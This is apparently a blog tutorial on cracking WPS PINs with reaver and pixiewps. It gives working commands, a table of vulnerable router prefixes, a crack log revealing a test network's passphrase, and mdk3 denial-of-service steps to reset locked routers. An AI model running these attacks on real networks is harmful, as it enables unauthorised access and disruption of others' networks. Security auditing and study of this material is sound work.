Wireless security auditing with reaver

Background

At the end of 2011, just days before 2012, security researcher Stefan Viehbock disclosed on his blog that WPS has a security vulnerability affecting a large number of wireless devices from many vendors. Since the details of the flaw were already public, attackers also knew about it and would undoubtedly exploit it. US-CERT therefore warned that millions of home wireless routers could be at risk of having their network passwords cracked [3].

After the news came out, the security firm Tactical Network Solutions (TNS) stated that it had discovered the flaw a year earlier but had withheld it because so many devices were affected. Now, for publicity, TNS released a free version of its PIN-cracking tool, reaver [3].

Four years later, reaver appears to have been taken over by t6x of the Kali community; the latest version, 1.5.2, integrates pixiewps through the -K 1 option, which greatly speeds up PIN enumeration.

Test environment

OS: Ubuntu Kylin 14.04 32-bit
Wireless adapter: TP-LINK TL-WN722N
Router: FAST FW150R

Chipsets affected by the Dust Attack

It does not work universally: APs with older Ralink chipsets and a small number of Broadcom chipsets are affected, while Atheros-based APs are not.
TP-LINK mostly uses Atheros chipsets, so it is essentially useless against them.

The following models can be cracked; see [5] for a more detailed list.

OUI prefix   Vendor / model        SSID pattern
62:6B:D3     EchoLife HG556a       vodafoneXXXX
62:53:D4     EchoLife HG556a       vodafoneXXXX
62:CB:A8     Huawei                vodafoneXXXX
6A:23:3D     Huawei                vodafoneXXXX
72:23:3D     Huawei                vodafoneXXXX
72:3D:FF     Huawei                vodafoneXXXX
72:55:9C     ?                     vodafoneXXXX

0C:96:BF     Ralink                Orange-XXXX
08:7A:4C     Ralink                Orange-XXXX
20:08:ED     Huawei                Orange-XXXX
D0:7A:B5     HG532s                Orange-XXXX
E8:CD:2D     HG530s                Orange-XXXX

00:A0:26     iRouter 1104-W        WLAN_XXXX
C8:D3:A3     D-Link                MOVISTAR_XXXX
B2:46:FC     -                     MOVISTAR_XXXX

5C:35:3B     Broadband             ONOXXXX
DC:53:7C     Compal                ONOXXXX

6C:B0:CE     NETGEAR (US) EX2700   -

Installing reaver 1.5.2

git clone git@github.com:t6x/reaver-wps-fork-t6x.git ./reaver15
cd reaver15/src
chmod 777 configure
./configure
make
sudo make install

Installing pixiewps

git clone git@github.com:wiire/pixiewps.git ./pixiewps
cd pixiewps/src
make
sudo make install

reaver combined with the dust attack

The -K 1 option needs to be added:

sudo reaver -i mon0 -b EC:88:8F:A1:A5:90 -K 1

reaver options explained

Let's use the option breakdown of one command [13] as an example.

sudo reaver -i mon0 -b EC:88:8F:A1:A5:90 -vv -N -L -d 60 -r 3:15 -T .5 -x 360 -s EC888FA1A590.wpc

-i   specifies the interface

-b   BSSID of the target, i.e. the target AP's MAC address

-vv   more verbose log output

-N   do not send NACK messages (try this if pinning makes no progress)

-L   ignore the locked state reported by the target AP

-d 60   --delay= Set the delay between pin attempts
Delay between PIN attempts, default 1 second; the right value depends on the router's protection features

-r 3:15   --recurring-delay= Sleep for y seconds every x pin attempts
Wait y seconds after every x PINs; here, wait 15 seconds after every 3 PINs

-T .5   -T, --m57-timeout= Set the M5/M7 timeout period [0.20]
M5/M7 timeout, default 0.2 seconds

-x 360   -x, --fail-wait= Set the time to sleep after 10 unexpected failures
Wait time after 10 unexpected failures, default 0 seconds

-s EC888FA1A590.wpc   -s, --session= Restore a previous session file
Resume brute-force progress from a file

A log of a successful run. It took roughly 3 to 4 days, pinning for a few hours each day and pausing whenever the router locked.

This log shows the last three digits (of the seven-digit body) being pinned from 070 through 079. The last digit of the PIN is a checksum, which can be derived from the first seven.

[+] 91.63% complete @ 2015-08-14 15:25:30 (67 seconds/pin)
[+] Trying pin 16030701
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Entering recurring delay of 15 seconds
[+] Trying pin 16030718
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 16030725
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 16030732
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Entering recurring delay of 15 seconds
[+] Trying pin 16030749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 91.67% complete @ 2015-08-14 15:31:11 (67 seconds/pin)
[+] Trying pin 16030756
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 16030763
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Entering recurring delay of 15 seconds
[+] Trying pin 16030770
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 16030787
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 16030794
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] 100.00% complete @ 2015-08-14 15:36:37 (67 seconds/pin)
[+] Pin cracked in 13517 seconds
[+] WPS PIN: '16030794'
[+] WPA PSK: 'robinlyh123!321'
[+] AP SSID: 'crack_me'
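As an added example (not reaver's or pixiewps' code), the following computes the checksum rule mentioned above, shows why the online PIN search stays small (the half-by-half confirmation reported by Viehbock [1]), and runs a small check over excerpts of the log above; the function names are mine.

```python
import re

# Added example (not reaver's or pixiewps' code): the WPS PIN checksum from the
# WPS specification, and a small check over reaver log lines as shown on this page.

def wps_checksum(body: int) -> int:
    """Checksum digit for a 7-digit PIN body: digits weighted 3,1,3,1,... from the right."""
    accum = 0
    while body:
        accum += 3 * (body % 10)
        body //= 10
        accum += body % 10
        body //= 10
    return (10 - accum % 10) % 10

def is_valid_pin(pin: str) -> bool:
    """True when an 8-digit PIN's last digit is the checksum of its first seven."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))

def pin_search_space() -> dict:
    """Why online guessing is feasible: the checksum removes one free digit, and the AP's
    reply to M4 confirms the first four digits while its reply to M6 confirms the last
    three, so the halves are searched independently: at most 10^4 + 10^3 attempts."""
    return {"all_digits": 10**8, "after_checksum": 10**7, "split_halves": 10**4 + 10**3}

TRY_RE = re.compile(r"\[\+\] Trying pin (\d{8})")
CRACKED_RE = re.compile(r"\[\+\] WPS PIN: '(\d{8})'")

def summarize_reaver_log(log: str) -> dict:
    """Count attempts and NACKs and report the recovered PIN, if any, from a reaver log."""
    pins = TRY_RE.findall(log)
    hit = CRACKED_RE.search(log)
    return {
        "attempts": len(pins),
        "checksums_valid": all(is_valid_pin(p) for p in pins),
        "nacks_received": log.count("[+] Received WSC NACK"),
        "cracked_pin": hit.group(1) if hit else None,
    }

# Abridged lines taken from the log shown on this page.
SAMPLE_LOG = """[+] Trying pin 16030701
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Trying pin 16030794
[+] Received M7 message
[+] WPS PIN: '16030794'
"""
```

Every "Trying pin" value in the log passes the checksum test, which is why reaver never spends time on the eighth digit.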

Problems you may run into

WPS transaction failed (code: 0x04)

Right after starting reaver it keeps reporting the error WPS transaction failed (code: 0x04).

Fix: roll back the libpcap0.8 version

See [12].

The two packages mentioned there, libpcap0.8_1.4.0-2_amd64.deb and libpcap0.8-dev_1.4.0-2_amd64.deb, are quite hard to find, but fortunately the original forum post provides a download. Elsewhere I have only found higher or lower versions.

Mixed 0x02 and 0x03 errors

The 0x02 and 0x03 codes are just reiterating the messages that you are already seeing: receive timeouts and out-of-order packets respectively. Without seeing the pcap it's hard to say what the problem might be, but you might try the --no-nacks option, which will prevent Reaver from instantly NACKing out-of-order packets.

Persistent failure to associate

[+] Waiting for beacon from 50:BD:5F:63:48:32
[!] WARNING: Failed to associate with 50:BD:5F:63:48:32 (ESSID: TESTWIFI)

The AP does not have WPS enabled, or does not support WPS.

Persistent "Receive timeout" warnings

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from EC:88:8F:A1:A5:90
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Associated with EC:88:8F:A1:A5:90 (ESSID: crack_me)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request

What I usually do is power off and unplug the USB adapter, then wait a while.

WPS transaction failed (code: 0x02)

Possible causes [10]:

  1. Low Signal Strength
  2. Weak Firewall of Router or Modem
  3. WPS is Locked

Low Signal Strength

If you have a low signal, i.e. above -80 dBi or below 20 dBi, then you will get this type of error because reaver is unable to establish its WPS PIN connection with the router.

Weak Firewall of Router or Modem

Reaver's PIN attempts come too fast, overwhelming the router so that it cannot keep up and crashes.

Fix: use -d to lower the probing rate.

You can tell reaver to wait a few seconds after each pin attempt; for this, add "-d 3" to your command, where 3 means wait 3 seconds before injecting the next pin.

Example is below

reaver -i mon0 -b BSSID -c Channel No -d 3 -w -vv

WPS is locked

You can use wash, the sniffing tool bundled with reaver, to check whether nearby APs are in the locked state.

wash -i mon0

You can also try my trick, which I use to unlock some routers that have locked WPS: I usually DoS attack the routers, which causes them to restart themselves.

I perform this attack using MDK3, and you can also give it a try by typing the command below.
Authentication-request denial-of-service attack:

mdk3 mon0 a -a bssid

This will DoS the router and cause it to restart itself, and once it has restarted, WPS will be unlocked.

Alternatively, run a deauthentication attack; it is best to configure a blacklist and whitelist first.

mdk3 mon0 d

Addendum

However, my tests with wash have always failed; it never captured anything.
The adapter chipsets I tested:
Intel Centrino Advanced-N 6230 AGN
ATHEROS USB2.0 WLAN
with the corresponding drivers:
iwlwifi
ath9k

Error log

Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg
BSSID Channel RSSI WPS Version WPS Locked ESSID
--------------------------------------------------------------------------------------

Other notes on wireless security auditing

Commonly used tools [17]

  1. aircrack-ng: the aircrack suite
  2. reaver & wash: WPS attacks
  3. pixiewps: offline WPS attack
  4. minidwep-gtk ("水滴", Water Drop)
  5. beini ("奶瓶", Feeding Bottle)
  6. mdk3: fake-SSID tool
  7. 打气筒 (Air Pump): often mentioned, but I don't know its original name
  8. wifislax: phishing / fake-AP tool
  9. Wifite: an automated WEP/WPA attack tool
  10. oclHashcat: GPU acceleration
  11. Fern Wifi Cracker: written in Python with a PyQt GUI; it can attack WEP/WPA/WPS WiFi networks and also perform MITM (man-in-the-middle) attacks
  12. Crunch: wordlist generator
  13. Macchanger: changes the local MAC address

Traditional WPA key cracking

This video sums it up well.

You need a strong dictionary and a lot of computing power; hash tables (rainbow tables) and GPUs can be used to speed up the computation.

The tool that uses hash tables (rainbow tables) is cowpatty.

GPU-accelerated computation uses pyrit.

Brute force works wonders

Compiled from the KCon 2015 talk 大力出奇迹のWiFi Hacking (Brute Force Works Wonders: WiFi Hacking)
Updated 2015-08-31

ZerOne WirelessSec Research 杨哲(Longas)
tec@#@#zeronesec.com

Main attack forms

Crack WPA
Pentest over WiFi
Fake AP
Air-Capture
MITM
WAP Tunnel
WAPJack
WIDS/WIPS/Hotspot
Deauth/Auth/Disco
WiFiphisher

Main techniques

Dictionary
WPA PMK Hash
WPS Online/Offline
Distributed
GPU
Cloud

Essentially there are only two approaches. One is to capture the critical handshake and then brute-force it; Distributed, GPU and Cloud merely speed up that computation.

I don't quite understand the WPA PMK Hash part yet.

The other exploits the design flaw in WPS: Online is Reaver, Offline is the Dust Attack.

Cloud platforms

As for dictionaries, I actually think WiFi万能钥匙 (WiFi Master Key) is itself a very important dictionary.
Platforms like this can also be used to collect dictionaries.

Use the cloud computing tool AntiMatter for online lookups:
http://free.wpapass.com/
The talk also compared it with popular overseas platforms.

For example:
GPUHASH
Cloud Cracker
HashCrack
HashBreak
Online HashCrack
darkircop

Finally

I also found that the author has written several books whose tables of contents look solid, such as 《无线网络安全攻防实战进阶》 and 《无线网络黑客攻防(畅销版)》; they can serve as references.

References

[1] Stefan Viehbock's report

[2] Stefan Viehbock's blog

[3] News coverage of the background

[4] Wireless security tool updates in Kali 2.0 (a brief look at how pixie combined with reaver works)

[5] pixiewps, list of affected chipsets

[5.1] Affected list 2, keyword "dsut"

[5.2] Affected list 3

[6] t6x's reaver project on GitHub

[7] pixiewps project on GitHub

[8] Wireless Auditing with Kali Linux - aircrack-ng, reaver, and pixiewps

[9] Kali update notes, with the pixie dust attack principle

[9.1] dust attack slides - Dominique Bongard @twitter

[10] Fix for reaver error code 0x02

[11] Fix for reaver error code 0x04 by downgrading packages

[12] libpcap0.8 downgrade fix

[13] Reaver v1.4 usage notes, including advanced options

[14] Integrating reaver with a Raspberry Pi

[14.1] The original requires circumventing network blocks to access

[15] WPS/PIN summary; PIN generation algorithms for some Tenda and Netcore models exposed

[16] TW Insights | 李建: Hacking the guy next door's router

[17] Top ten WiFi attack tools in Kali Linux

[18] 杨哲's blog

[19] Wireless security cloud computing services